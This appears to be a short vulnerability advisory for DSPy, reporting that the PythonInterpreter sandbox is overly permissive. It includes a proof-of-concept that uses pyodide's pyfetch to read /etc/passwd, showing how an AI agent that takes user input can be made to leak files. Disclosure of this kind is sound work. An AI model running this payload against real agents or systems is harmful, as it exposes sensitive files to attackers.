Insecure configuration in DSPy lead to arbitrary file read when running untrusted code inside the sandbox
dspy
(,)
The overly permissive sandbox configuration in DSPy allows attackers to steal sensitive files in cases when users build an AI agent which consumes user input and uses the “PythonInterpreter” class.
import dspy
interpreter = dspy.PythonInterpreter()
expr = "from pyodide.http import pyfetch; response = await pyfetch(\"file:////etc/passwd\");data = await response.text(); print(data)"
answer = interpreter.execute(expr)
print(answer)
No mitigations are supplied for this issue